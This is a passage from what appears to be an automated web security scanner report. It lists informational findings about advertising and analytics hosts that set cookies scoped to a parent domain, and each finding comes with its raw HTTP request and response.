Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visitor_id3682=160859557; pardot=h5gc13lruog4br7fbhilcbhh31; visitor_id1852=191471185

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:33:53 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3p: CP="CAO DSP AND SO ON" policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding,User-Agent
Content-Length: 680
Content-Type: text/javascript; charset=utf-8
Set-Cookie: pi_opt_in1852=3c12a2182101972e2629218d; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com
Set-Cookie: visitor_id1852=191471275; expires=Mon, 06-Sep-2021 15:33:53 GMT; path=/; domain=.pardot.com
Set-Cookie: lpv1852=aHR0cDovL3d3dy56bm9kZS5jb20vem5vZGUtbXVsdGlmcm9udC9mZWF0dXJlLmFzcHg=; expires=Tue, 06-Sep-2011 16:03:53 GMT; path=/; secure
X-Pardot-LB: lb-d2
Connection: close

function piResponse() {
piSetCookie('visitor_id1852', '191471275', 3650);
if (document.location.protocol != "https:") {
var analytics_link = "http://" + "www2.znode.com/analytics?";
pi.tracker.visitor
...[SNIP]...

12.44. http://ping.crowdscience.com/ping.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ping.crowdscience.com
Path:	/ping.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

__csv=2a31db5320bf2a6b; Domain=.crowdscience.com; expires=Mon, 05 Dec 2011 15:32:56; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1315341159227&c=0&t=0&v=0&m=0&vn=2.0.4 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:56 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=2a31db5320bf2a6b; Domain=.crowdscience.com; expires=Mon, 05 Dec 2011 15:32:56; Path=/
Content-Length: 8286
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

(function (){

var cs = CrowdScience;

cs.state = 1; // cs.states.ping_loading;

cs.invitation_beforeShow = function() {};
cs.invitation_afterShow = function() {};

cs.i
...[SNIP]...

12.45. http://pixel.fetchback.com/serve/fb/pdc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cmp=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
uid=1_1315323148_1315323137705:2485910142863198; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
kwd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
sit=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
cre=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
bpd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
apd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
scg=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
ppd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
afl=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
act=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: opt=1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:28 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: uid=1_1315323148_1315323137705:2485910142863198; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: kwd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sit=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cre=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bpd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: apd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: scg=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ppd=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: afl=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: act=1_1315323148; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:32:28 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40

12.46. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EKwBGAHSB7vRG9iBDYQh8Q; expires=Mon, 05-Dec-2011 15:00:28 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1150096029;fpan=1;fpa=P0-1990433296-1315339228713;ns=0;url=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1315339228711;tzo=300;a=p-9eJ8k4iSzux46;labels=CNBC.Section.search%2CCNBC.Sub%20Section.Search%7CAll HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EF8BHwHSB4EQCa0QvYgQAshAHxA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EKwBGAHSB7vRG9iBDYQh8Q; expires=Mon, 05-Dec-2011 15:00:28 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Tue, 06 Sep 2011 15:00:28 GMT
Server: QS

12.47. http://public.deloitte.com/media/00Global/social_links/dtt_email_16x16.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://public.deloitte.com
Path:	/media/00Global/social_links/dtt_email_16x16.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; expires=Monday, 01-Jan-2035 00:00:00 GMT; path=/; domain=.deloitte.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/00Global/social_links/dtt_email_16x16.gif HTTP/1.1
Host: public.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/Services/additional-services/talent-human-capital-hr/Talent-Library/558d34d8a3a2f210VgnVCM3000001c56f00aRCRD.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; __utma=55230644.1519156675.1315342619.1315342619.1315342619.1; __utmc=55230644; __utmz=55230644.1315342619.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=56; SC_LINKS=us%3Asearch%5E%5ETalent%5E%5Eus%3Asearch%20%7C%20Talent%5E%5E; s_nr=1315345935038-Repeat; s_vnum=1747342618651%26vn%3D2; s_invisit=true; s_ppg=us%3Asearch; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Asearch%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FServices%25252Fadditional-services%25252Ftalent-human-capital-hr%25252FTalent_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Expires: Wed, 07 Sep 2011 16:52:17 GMT
Set-Cookie: SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; expires=Monday, 01-Jan-2035 00:00:00 GMT; path=/; domain=.deloitte.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Date: Tue, 06 Sep 2011 16:52:17 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Thu, 06 Aug 2009 16:11:30 GMT
ETag: "4090ff8eb016ca1:926"
Content-Length: 405

GIF89a........................(........x........K........\...........Z.....$..%..E....p..... ..'.....P.................x..H............................................................................
...[SNIP]...

12.48. http://r.openx.net/img previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/img

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Thu, 05-Sep-2013 15:32:13 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img?pixel_id=52bb1d64d5b1cddb69e55780dd37f64a HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1315103289; i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:13 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; expires=Thu, 05-Sep-2013 15:32:13 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:36:31 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=10667129/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315341389329&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:36:31 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:36:31 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:36:31 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=1
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:46:48 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=12485207/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342006119&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1069543.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:46:48 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:46:48 GMT
Content-Length: 996
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:46:48 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<iframe src="http://view.atdmt.com/BVK/iview/349019750/direct/01/8665855478?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001069543/cstr=12485207=_4e664067,866585
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:07:26 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=18715440/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315343244277&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 16:07:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 16:07:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 16:07:26 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=1
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:51:56 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=31433009/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315342314330&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:51:56 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:51:56 GMT
Connection: close
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:51:56 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=3
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:26:14 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=768033/size=300250/u=2/bnum=32696846/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340773276&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A07L=3SxR2fBwD-FqRFfbbQK7GEUcwd8RUXR5G_dLiwkQZpaLeKMxC2ApUDg; ACID=optout!

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1017217.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Tue, 06 Sep 2011 15:26:14 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 561
Date: Tue, 06 Sep 2011 15:26:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: A07L=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Mon, 06-Sep-2021 15:26:14 GMT; path=/
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

document.write('<script language="JavaScript" src="http://d7.zedo.com/jsc/d3/fl.js?n=1197&c=38&s=2&d=9&w=300&h=250&r=29&l=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0001017217/cstr=3
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=41330653/hr=16/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fdata.cnbc.com%252Fquotes%252F.DJIA

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

